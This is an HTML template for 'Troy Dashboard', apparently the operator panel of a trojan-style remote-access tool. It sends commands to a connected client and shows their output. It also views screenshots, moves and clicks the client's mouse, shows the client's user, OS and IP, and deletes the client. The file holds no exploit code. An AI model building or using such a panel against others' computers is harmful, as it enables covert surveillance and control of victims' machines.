<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org" lang="en">
<head>
    <meta charset="UTF-8"/>
    <title>Troy Dashboard</title>
    <link rel="stylesheet" href="../vorlage.css"/>
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"/>
    <script rel="script" src="../urlParam.js"></script>
</head>
<body>
<center>
    <div id="outer">
        <div id="inner">
            <h1 th:text="'Control Panel for ' + ${client.nickname}"></h1>
            <hr/>
            <div class="w3-card-4 w3-container w3-light-grey">
                <h3>Client Commands</h3>
                <pre th:text="${client.command} + ' '" class="log"></pre>

                <br/>
                <form th:action="'/command/edit/' + ${client.client}" th:method="post" method="post">
                    <label for="commandsField">Command:</label>
                    <input style="width: 400px;" id="commandsField" spellcheck="false" name="commands"
                           th:value="${client.command}" class="input log w3-card-4" autocomplete="off"
                           placeholder="Command"/>
                    <input type="submit" class="input w3-card-4" value="Speichern" id="primaryAction"/>
                </form>
                <br/>
            </div>
            <br/>
            <div class="w3-card-4 w3-container w3-light-grey">
                <h3>Commands output</h3>
                <form th:action="'/dashboard/' + ${client.client}" th:method="post" method="post">
                    <input type="submit" value="Clear" class="input secondaryAction w3-card-4"/>
                    <a th:href="'/dashboard/' + ${client.client}"
                       class="input secondaryAction w3-card-4">Reload</a>
                </form>
                <!--/*@thymesVar id="log" type="ch.lebois.troyserver.controller.DashboardController"*/-->
                <pre class="log logb" id="log" th:text="${logs}"></pre>
                <br/>
            </div>
            <br/>


            <div class="w3-row-padding">
                <div class="w3-col s6">
                    <div class="w3-card-4 w3-container w3-light-grey">
                        <h3>Client Info</h3>
                        <table class="w3-table w3-bordered">
                            <tr>
                                <th>
                                    <b>Computer User</b>
                                </th>
                                <td th:text="${client.pcuser}"></td>
                            </tr>
                            <tr>
                                <th>
                                    <b>Last Seen</b>
                                </th>
                                <td th:text="${client.lastseen}"></td>
                            </tr>
                            <tr>
                                <th>
                                    <b>Operating System</b>
                                </th>
                                <td th:text="${client.os}"></td>
                            </tr>
                            <tr>
                                <th>
                                    <b>Ip Adress</b>
                                </th>
                                <td th:text="${client.ip}"></td>
                            </tr>
                            <tr>
                                <th>
                                    <b>Hermann Arch</b>
                                </th>
                                <td th:text="${client.arch}"></td>
                            </tr>
                        </table>
                    </div>
                </div>
                <div class="w3-col s6">
                    <div class="w3-card-4 w3-container w3-light-grey">
                        <h3>Screenshots</h3>
                        <ul class="w3-ul w3-card-4 w3-hoverable">
                            <li style="cursor: pointer" th:each="img:${images}" class="w3-display-container"
                                th:onClick="'javascript:document.getElementById(\''+ ${img.name} +'\').style.display=\'block\';'">
                                <a th:text="${img.name}">
                                </a>
                                <a th:href="'/dashboard/img/' + ${img.name} + '/remove?client=' + ${client.client}"
                                   class="w3-button w3-display-right w3-hover-red">&times;</a>
                            </li>
                        </ul>
                        <br/>
                    </div>
                </div>
            </div>

            <br/>


            <div class="w3-row-padding">
                <div class="w3-col s6">
                    <div class="w3-card-4 w3-container w3-light-grey">
                        <h3>Settings</h3>
                        <form th:action="'/dashboard/' + ${client.client} + '/edit'" method="post">
                            <table class="w3-table w3-bordered">
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Allgemein
                                    </th>
                                    <td width="50%">
                                    </td>
                                </tr>
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Pc Name
                                    </th>
                                    <td width="50%">
                                        <input name="nickname" th:value="${client.nickname}" class="w3-input"/>
                                    </td>
                                </tr>
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Refresh time
                                    </th>
                                    <td width="50%">
                                        <input name="refresh" th:value="${client.refreshtime}" class="w3-input"
                                               type="number"/>
                                    </td>
                                </tr>
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Delete (Enter 'kill')
                                    </th>
                                    <td width="50%">
                                        <input name="kill" class="w3-input" type="text" style="outline-color:red"/>
                                    </td>
                                </tr>
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Maus
                                    </th>
                                    <td width="50%">
                                    </td>
                                </tr>
                                <tr>
                                    <th width="30%" style="padding-top: 15px">
                                        Move mouse
                                    </th>
                                    <td width="70%">
                                        <div class="w3-row" style="text-align: center">
                                            <div class="w3-quarter" style="padding-top: 5px">
                                                X
                                            </div>
                                            <div class="w3-quarter">
                                                <input name="mousex" class="w3-input" type="text"/>
                                            </div>
                                            <div class="w3-quarter" style="padding-top: 5px">
                                                Y
                                            </div>
                                            <div class="w3-quarter">
                                                <input name="mousey" class="w3-input" type="text"/>
                                            </div>
                                        </div>
                                    </td>
                                </tr>
                                <tr>
                                    <th width="50%" style="padding-top: 15px">
                                        Mouse click
                                    </th>
                                    <td width="50%">
                                        <form th:action="'/dashboard/' + ${client.client} + '/click'"
                                              method="post">
                                            <input type="submit" value="Click"
                                                   class="input secondaryAction w3-card-4"/>
                                        </form>
                                    </td>
                                </tr>
                                <tr>
                                    <th>
                                    </th>
                                    <td>
                                        <input type="submit" value="Speichern" class="input secondaryAction w3-card-4"/>
                                    </td>
                                </tr>
                            </table>
                        </form>
                    </div>
                </div>
            </div>

            <br/>
            <a href="../dashboard" class="input secondaryAction w3-card-4">Back</a>
        </div>
    </div>
</center>
<div th:each="img:${images}" th:id="${img.name}" class="w3-modal w3-card-4" onclick="this.style.display='none'">
    <div class="w3-modal-content w3-animate-zoom">
        <header style="cursor: pointer" class="w3-container w3-light-grey">
            <h3 th:text="${img.name}"></h3>
            <span class="w3-button w3-hover-red w3-xlarge w3-display-topright">&times;</span>
        </header>
        <img th:src="'../dashboard/img/' + ${img.name}" style="width:100%"/>
    </div>
</div>

<div style="position: fixed; bottom: 3px; right: 3px; padding: 3px;" class="w3-card-4">
    寒意
</div>
</body>
</html>
